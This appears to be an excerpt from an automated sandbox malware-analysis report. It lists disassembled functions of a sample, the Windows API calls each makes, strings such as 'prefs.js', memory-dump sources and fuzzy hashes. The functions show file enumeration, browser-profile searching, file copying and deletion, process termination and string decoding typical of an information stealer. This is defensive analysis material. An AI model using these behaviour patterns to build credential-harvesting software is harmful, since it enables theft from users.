nd 3, xrefs: 048FF57E
expa, xrefs: 048FFA22
2-by, xrefs: 048FF7D5
2-byexpa, xrefs: 048FF7BC
te k, xrefs: 048FF7AE
expand 3, xrefs: 048FF94C
expand 32-by, xrefs: 048FF82F
te knd 3expand 32-by, xrefs: 048FF7B5

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID:
String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
API String ID: 0-1562099544
Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction ID: 1e798cb210156cca2629da4fed63cb19a855f135ed650e124bdfb70324ba2320
Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction Fuzzy Hash: BEE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56

Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
FindClose.KERNEL32(000000FF), ref: 0040E4F2

Strings

\*.*, xrefs: 0040DF26
4@, xrefs: 0040DF32, 0040E500, 0040DFF3, 0040DF75, 0040DFF6

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4@$\*.*
API String ID: 2325840235-1993203227
Opcode ID: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
Opcode Fuzzy Hash: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A

Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
FindClose.KERNEL32(000000FF), ref: 0040FBC3

Strings

prefs.js, xrefs: 0040F912

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
Opcode Fuzzy Hash: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A

Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042523C,?,00401F6C,?,004252E4,?,?,00000000,?,00000000), ref: 00401963
StrCmpCA.SHLWAPI(?,0042538C), ref: 004019B3
StrCmpCA.SHLWAPI(?,00425434), ref: 004019C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
DeleteFileA.KERNEL32(00000000), ref: 00401E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
FindClose.KERNEL32(000000FF), ref: 00401E72

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Strings

\*.*, xrefs: 00401831

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 9549c30126817f326a863de8f6b845c9f620a8f883f83f76820f6c7fe28d42c5
Instruction ID: df326988fd69e0da1611ef2be43153edb0d5c51867ec3eea105421fd5dfb977f
Opcode Fuzzy Hash: 9549c30126817f326a863de8f6b845c9f620a8f883f83f76820f6c7fe28d42c5
Instruction Fuzzy Hash: F5125171A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9

Function 048CF087 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 048CF0A5
FindFirstFileA.KERNEL32(?,?), ref: 048CF0BC
StrCmpCA.SHLWAPI(?,00421630), ref: 048CF112
StrCmpCA.SHLWAPI(?,00421634), ref: 048CF128
FindNextFileA.KERNEL32(000000FF,?), ref: 048CF615
FindClose.KERNEL32(000000FF), ref: 048CF62A

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
Instruction ID: 9cc7d49cbb95c322ad566ea4900bb253127177a1700bf7afe5d4f5599dd4cc3e
Opcode Fuzzy Hash: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
Instruction Fuzzy Hash: BDE1E1719022285AEB5CFB64DC50EEE7338AF54205F504AE9A50BE2091EFB07F89CF51

Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
FindClose.KERNEL32(000000FF), ref: 0040DEDE

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
Opcode Fuzzy Hash: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A

Function 048CDDE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 048CDE52
StrCmpCA.SHLWAPI(?,004215AC), ref: 048CDE9A
StrCmpCA.SHLWAPI(?,004215B0), ref: 048CDEB0
FindNextFileA.KERNEL32(000000FF,?), ref: 048CE133
FindClose.KERNEL32(000000FF), ref: 048CE145

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
Instruction ID: 81af8d8912080787048ef9f87fc4a4a330e291610c5cb9ba9cc967dcfb983dbd
Opcode Fuzzy Hash: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
Instruction Fuzzy Hash: 6E914472A0110897DB18FBB8EC55DED7379AF94205F104B6DA847D6150EFB4FB088B92

Function 048CFA17 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 048CFA85
StrCmpCA.SHLWAPI(?,004216B4), ref: 048CFAD6
StrCmpCA.SHLWAPI(?,004216B8), ref: 048CFAEC
FindNextFileA.KERNEL32(000000FF,?), ref: 048CFE18
FindClose.KERNEL32(000000FF), ref: 048CFE2A

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
Instruction ID: a690c1ea6ed57f39c5d25ca4b4a9833549e77926da035f0285b24893ef4709fc
Opcode Fuzzy Hash: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
Instruction Fuzzy Hash: ECB13171A012189BEB28FF64DC94EED7375AF54304F504AAD950AD6190EFB0BB48CF92

Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
CloseHandle.KERNEL32(00000000), ref: 00419987
CloseHandle.KERNEL32(00409FDE), ref: 00419993

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91

Function 048D9B47 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048D9B6C
Process32First.KERNEL32(048CA245,00000128), ref: 048D9B80
Process32Next.KERNEL32(048CA245,00000128), ref: 048D9B95
StrCmpCA.SHLWAPI(?,048CA245), ref: 048D9BAA
OpenProcess.KERNEL32(00000001,00000000,?), ref: 048D9BC3
TerminateProcess.KERNEL32(00000000,00000000), ref: 048D9BE1
CloseHandle.KERNEL32(00000000), ref: 048D9BEE
CloseHandle.KERNEL32(048CA245), ref: 048D9BFA

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction ID: 1e71b61daa7452593c83f103987deca58309400eecb1ee75bb4c690021dbf26a
Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction Fuzzy Hash: 3B111FB5E05218EBCB24DFA5DC88BDE7779AF48700F008689F505A6240EB34AB44CF51

Function 0040E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF

Strings

@, xrefs: 0040ECF5, 0040E6EB, 0040E81C, 0040E95B, 0040E5B9, 0040E6EE, 0040E81F, 0040E95E
\*.*, xrefs: 0040E54D

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$@
API String ID: 433455689-2355794846
Opcode ID: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
Opcode Fuzzy Hash: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A

Function 048C1977 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042523C,?,?,?,004252E4,?,?,00000000,?,00000000), ref: 048C1BCA
StrCmpCA.SHLWAPI(?,0042538C), ref: 048C1C1A
StrCmpCA.SHLWAPI(?,00425434), ref: 048C1C30
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048C1FE7
DeleteFileA.KERNEL32(00000000), ref: 048C2071
FindNextFileA.KERNEL32(000000FF,?), ref: 048C20C7
FindClose.KERNEL32(000000FF), ref: 048C20D9

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID:
API String ID: 1415058207-0
Opcode ID: b85232a698949c79e4680004d1e76e0f04a31e92f8088ffb748d566cac29b108
Instruction ID: 734f5f7ccc0ba01d832254769d6767b5c8ba5acef29e661a5923718a6091755d
Opcode Fuzzy Hash: b85232a698949c79e4680004d1e76e0f04a31e92f8088ffb748d566cac29b108
Instruction Fuzzy Hash: 2412CA719022189ADB1DEB64DC94EED7378AF54305F504AEDA50BE2090EFB47B88CF52

Function 048CE177 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,004215B8,00420C32), ref: 048CE1C5
StrCmpCA.SHLWAPI(?,004215C0), ref: 048CE215
StrCmpCA.SHLWAPI(?,004215C4), ref: 048CE22B
FindNextFileA.KERNEL32(000000FF,?), ref: 048CE747
FindClose.KERNEL32(000000FF), ref: 048CE759

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID:
API String ID: 2325840235-0
Opcode ID: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
Instruction ID: 713a3fea9fd945a2e5623d9a41448ce2298508011ac140138908985b3c9cc96a
Opcode Fuzzy Hash: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
Instruction Fuzzy Hash: 1CF1DF719552289ADB1DEB64DC94EEE7338AF14305F904ADE944BE2090EFB07F88CE51

Function 0040C920 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C953
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02EB20E0), ref: 0040C971
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
memcpy.MSVCRT(?,?,?), ref: 0040CA12
lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
